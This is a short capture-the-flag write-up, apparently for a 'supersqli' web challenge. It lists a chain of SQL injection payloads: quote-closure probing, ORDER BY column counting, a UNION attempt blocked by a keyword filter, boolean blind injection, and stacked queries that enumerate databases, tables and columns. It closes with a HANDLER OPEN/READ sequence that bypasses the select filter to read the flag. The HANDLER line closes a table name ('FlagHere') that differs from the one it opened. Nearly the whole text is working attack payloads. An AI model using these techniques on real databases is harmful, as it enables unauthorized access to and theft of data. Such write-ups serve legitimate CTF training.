1'#未报错,应该是''闭合的;
1' order by 3# 报错
1' union select 1,2# ==>return preg_match("/select|update|delete|drop|insert|where|./i",$inject);
0' or length(database())=9# ==> 正常回显
用布尔盲注确定database()=supersqli
堆叠注入 1';show databases;#
ctftraining,information_schema,mysql,performance_schema,supersqli,test
1';show tables;#
1919810931114514,words
1';show columns from words from supersqli;#
id,data
1';show columns from 1919810931114514
from supersqli;#
flag
1';Handler 1919810931114514
OPEN;Handler 1919810931114514
read first;Handler FlagHere close;#
得到flag